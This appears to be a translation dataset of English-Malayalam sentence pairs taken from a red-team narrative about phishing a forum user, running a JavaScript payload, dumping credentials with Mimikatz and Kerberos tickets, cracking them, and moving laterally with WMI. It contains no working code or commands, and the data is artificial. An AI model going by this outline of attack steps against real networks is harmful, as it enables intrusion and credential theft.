| {"en":"With Cobalt Strike Aggressor Scripts, not only can you configure autorun style scripts, but you can also create very complex attacks.","translation":"കോബാൾട്ട് സ്ട്രൈക്ക് അഗ്രസ്സർ സ്ക്രിപ്റ്റുകൾ ഉപയോഗിച്ച്, നിങ്ങൾക്ക് ഓട്ടോറൺ ശൈലിയിലുള്ള സ്ക്രിപ്റ്റുകൾ കോൺഫിഗർ ചെയ്യാൻ മാത്രമല്ല, വളരെ സങ്കീർണ്ണമായ ആക്രമണങ്ങൾ നടത്താനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"For example, I often come across the situation where we get on a shared workstation, like a lab or conference room box.","translation":"ഉദാഹരണത്തിന്, ലാബ് അല്ലെങ്കിൽ കോൺഫറൻസ് റൂം ബോക്സ് പോലുള്ള ഒരു ഷെയർഡ് വർക്ക്സ്റ്റേഷനിൽ ഞങ്ങൾ എപ്പോഴും എത്താറുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"One thing I may want our agent to do is run Mimikatz every half hour to pull clear text credentials.","translation":"ഞങ്ങളുടെ ഏജന്റ് ചെയ്യണമെന്ന് ഞാൻ ആഗ്രഹിക്കുന്ന ഒരു കാര്യം, ഓരോ അരമണിക്കൂറിലും മിമികാറ്റ്സ് പ്രവർത്തിപ്പിച്ച് വ്യക്തമായ ടെക്സ്റ്റ് ക്രെഡൻഷ്യലുകൾ എടുക്കുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"With Aggressor Scripts, we can do all these actions and more.","translation":"അഗ്രസ്സർ സ്ക്രിപ്റ്റുകൾ ഉപയോഗിച്ച്, നമുക്ക് ഈ പ്രവർത്തനങ്ങളെല്ലാം ചെയ്യാനും അതിലേറെ കാര്യങ്ങൾ ചെയ്യാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"You laugh as you see that one of the users, Chris Catfield, used the password “Summer2018!”.","translation":"ക്രിസ് കാറ്റ്ഫീൽഡ് എന്ന ഉപയോക്താവ് “Summer2018!” എന്ന പാസ്വേഡ് ഉപയോഗിച്ചതു കണ്ടപ്പോൾ നിങ്ങൾ ചിരിച്ചു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Next, you log into the forum as Chris, read through all his private messages and posts to figure out the best method to get your initial foothold.","translation":"അടുത്തതായി, നിങ്ങൾ ക്രിസ് എന്ന നിലയിൽ ഫോറത്തിൽ പ്രവേശിക്കുകയും നിങ്ങളുടെ പ്രാരംഭ അടിത്തറ നേടുന്നതിനുള്ള ഏറ്റവും മികച്ച രീതി കണ്ടെത്താൻ അദ്ദേഹത്തിന്റെ എല്ലാ സ്വകാര്യ സന്ദേശങ്ങളും പോസ്റ്റുകളും വായിക്കുകയും ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"You see that Chris regularly talks to another internal employee on the forum, Neil Pawstrong, about the space program.","translation":"ബഹിരാകാശ പദ്ധതിയെക്കുറിച്ച് ക്രിസ്, നീൽ പോസ്ട്രോംഗ് എന്ന മറ്റൊരു ജീവനക്കാരനുമായി പതിവായി ഫോറത്തിൽ സംസാരിക്കുന്നത് നിങ്ങൾ കാണുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"It looks like they are not really friends, but have a good working relationship.","translation":"അവർ ശരിക്കും സുഹൃത്തുക്കളല്ല, പക്ഷേ നല്ലൊരു തൊഴിൽ ബന്ധമുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"This is good as it will make the next phish a trusted attack.","translation":"ഇത് നല്ലതാണ്, കാരണം ഇത് അടുത്ത ഫിഷിനെ വിശ്വസനീയമായ ആക്രമണമാക്കി മാറ്റും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Using Chris' account, we already have the rapport between the two users and the likelihood of success is great.","translation":"ക്രിസിന്റെ അക്കൗണ്ട് ഉപയോഗിച്ച്, രണ്ട് ഉപയോക്താക്കൾ തമ്മിലുള്ള ബന്ധം നമുക്കുണ്ട്, വിജയസാധ്യത വളരെ കൂടുതലാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"You debate whether or not you should send Neil a custom malware payload, as that might be too obvious.","translation":"നീലിന് ഒരു ഇഷ്ടമുള്ള മാൽവെയർ പേലോഡ് അയയ്ക്കണോ വേണ്ടയോ എന്ന് നിങ്ങൾ ചർച്ച ചെയ്യുന്നു, കാരണം അത് വളരെ വ്യക്തമായേക്കാം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Instead, you send a link to a cat photo webpage that you have stood up with the message, “Hey Neil, I know you love cats! Check out this page I made!”","translation":"പകരം, നിങ്ങൾ ഒരു പൂച്ചയുടെ ഫോട്ടോ വെബ്പേജിലേക്കുള്ള ഒരു ലിങ്ക് അയയ്ക്കുന്നു, “ഹേയ് നീൽ, നിങ്ങൾക്ക് പൂച്ചകളെ ഇഷ്ടമാണെന്ന് എനിക്കറിയാം! ഞാൻ ഉണ്ടാക്കിയ ഈ പേജ് ഒന്ന് നോക്കൂ!”","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"A few minutes later, you get a message back on the forum site from Neil that says, \"LOL, I love space cats!\"","translation":"കുറച്ച് മിനിറ്റുകൾക്ക് ശേഷം, “ചിരി, എനിക്ക് ബഹിരാകാശ പൂച്ചകളെ ഇഷ്ടമാണ്!” എന്ന് പറയുന്ന നീലിന്റെ സന്ദേശം നിങ്ങൾക്ക് ഫോറം സൈറ്റിൽ നിന്ന് ലഭിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Little did Neil realize that the webpage he visited had a custom JavaScript payload that ran code on his machine to scan his internal CSK network and compromise unauthenticated Jenkins and Tomcat webservers.","translation":"നീൽ സന്ദർശിച്ച വെബ്പേജിൽ, അദ്ദേഹത്തിന്റെ ആന്തരിക CSK നെറ്റ്വർക്ക് സ്കാൻ ചെയ്യാനും, പ്രാമാണീകരിക്കാത്ത ജെൻകിൻസും ടോംകാറ്റ് വെബ്സെർവറുകളും തകർക്കാനും അദ്ദേഹത്തിന്റെ മെഷീനിൽ കോഡ് പ്രവർത്തിപ്പിക്കുന്ന ഒരു ഇഷ്ടമുള്ള ജാവാസ്ക്രിപ്റ്റ് പേലോഡ് ഉണ്ടെന്ന് നീൽ അറിഞ്ഞില്ല.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Within a few seconds, you start to get Empire payloads back and let out a sigh of relief.","translation":"നിമിഷങ്ങൾക്കകം, നിങ്ങൾക്ക് എംപയർ പേലോഡുകൾ തിരികെ ലഭിക്കാൻ തുടങ്ങുന്നു, ആശ്വാസത്തോടെ ഒരു നെടുവീർപ്പിടുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As your senses tingle, you know it is only a matter of time before the Blue Team starts putting in firewall/DNS/host blocks, so you have to move quickly.","translation":"നിങ്ങളുടെ ഇന്ദ്രിയങ്ങൾ ഉണരുമ്പോൾ, ബ്ലൂ ടീം ഫയർവാൾ/ഡിഎൻഎസ്/ഹോസ്റ്റ് ബ്ലോക്കുകൾ സ്ഥാപിക്കാൻ തുടങ്ങുന്നതിന് കുറച്ച് സമയമെടുക്കുമെന്നും, അതിനാൽ നിങ്ങൾ വേഗത്തിൽ നീങ്ങണമെന്നും നിങ്ങൾക്കറിയാം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Fortunately, you have already set up the automation to do a lot of the dirty work.","translation":"ഭാഗ്യവശാൽ, കൂടുതൽ ജോലികൾ ചെയ്യാനുള്ള ഓട്ടോമേഷൻ നിങ്ങൾ ഇതിനകം സജ്ജീകരിച്ചിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The compromised host beacon activates and starts to run tools like Bloodhound, look for local passwords, set the registry bit to capture Mimikatz LSASS passwords, run SPN and dump all Kerberos tickets, and of course set up persistence in scheduled tasks.","translation":"കമ്പ്യൂട്ടർ വഴി വിവരങ്ങൾ ചോർത്തുന്ന ബീക്കൺ സജീവമാവുകയും ബ്ലഡ്ഹൗണ്ട് പോലുള്ള ടൂളുകൾ പ്രവർത്തിപ്പിക്കാൻ തുടങ്ങുകയും ചെയ്യുന്നു, പ്രാദേശിക പാസ്വേഡുകൾക്കായി തിരയുക, മിമികാറ്റ്സ് എൽഎസ്എഎസ്എസ് പാസ്വേഡുകൾ നേടുന്നതിന് രജിസ്ട്രി ബിറ്റ് സജ്ജീകരിക്കുക, എസ്പിഎൻ പ്രവർത്തിപ്പിക്കുക, എല്ലാ കെർബറോസ് ടിക്കറ്റുകളും ഡംപ് ചെയ്യുക, കൂടാതെ ഷെഡ്യൂൾ ചെയ്ത ടാസ്ക്കുകളിൽ സ്ഥിരത സ്ഥാപിക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"You know that you need to move quickly off this initial box.","translation":"ഈ പ്രാരംഭ ബോക്സിൽ നിന്ന് നിങ്ങൾ വേഗത്തിൽ നീങ്ങേണ്ടതുണ്ടെന്ന് നിങ്ങൾക്കറിയാം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"You take all the Kerberos tickets and dump them into Hashcat to start cracking.","translation":"എല്ലാ കെർബറോസ് ടിക്കറ്റുകളും എടുത്ത് ക്രാക്ക് ചെയ്യാൻ തുടങ്ങുന്നതിന് ഹാഷ്കാറ്റിലേക്ക് ഇടുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"It's a good thing you found those extra bug bounties to buy a couple of 1080TI GPUs.","translation":"കുറച്ച് 1080TI GPU-കൾ വാങ്ങാൻ നിങ്ങൾക്ക് അധിക ബഗ് ബൗണ്ടികൾ ലഭിച്ചത് നല്ല കാര്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As they start cracking, you see some service account passwords popping up, but you don't have time for those yet.","translation":"അവ ക്രാക്ക് ചെയ്യാൻ തുടങ്ങുമ്പോൾ, ചില സേവന അക്കൗണ്ട് പാസ്വേഡുകൾ പോപ്പ് അപ്പ് ചെയ്യുന്നത് നിങ്ങൾ കാണുന്നു, പക്ഷേ അതിനൊന്നും നിങ്ങൾക്ക് ഇപ്പോൾ സമയമില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"You review the Bloodhound output and realize that the compromised box belongs to Neil Pawstrong and that his AD account has access to Buzz Clawdrin's box.","translation":"നിങ്ങൾ ബ്ലഡ്ഹൗണ്ട് ഔട്ട്പുട്ട് അവലോകനം ചെയ്യുകയും, വിട്ടുവീഴ്ച ചെയ്ത ബോക്സ് നീൽ പോസ്ട്രോംഗിന്റേതാണെന്നും, അദ്ദേഹത്തിന്റെ AD അക്കൗണ്ടിന് ബസ് ക്ലോഡ്രിന്റെ ബോക്സിലേക്ക് പ്രവേശനമുണ്ടെന്നും മനസ്സിലാക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Using WMI, you remotely spawn another payload onto his system and migrate into a process owned by Buzz.","translation":"WMI ഉപയോഗിച്ച്, നിങ്ങൾ വിദൂരമായി മറ്റൊരു പേലോഡ് അദ്ദേഹത്തിന്റെ സിസ്റ്റത്തിലേക്ക് സ്പോൺ ചെയ്യുകയും ബസ് സ്വന്തമാക്കിയ ഒരു പ്രക്രിയയിലേക്ക് മൈഗ്രേറ്റ് ചെയ്യുകയും ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} |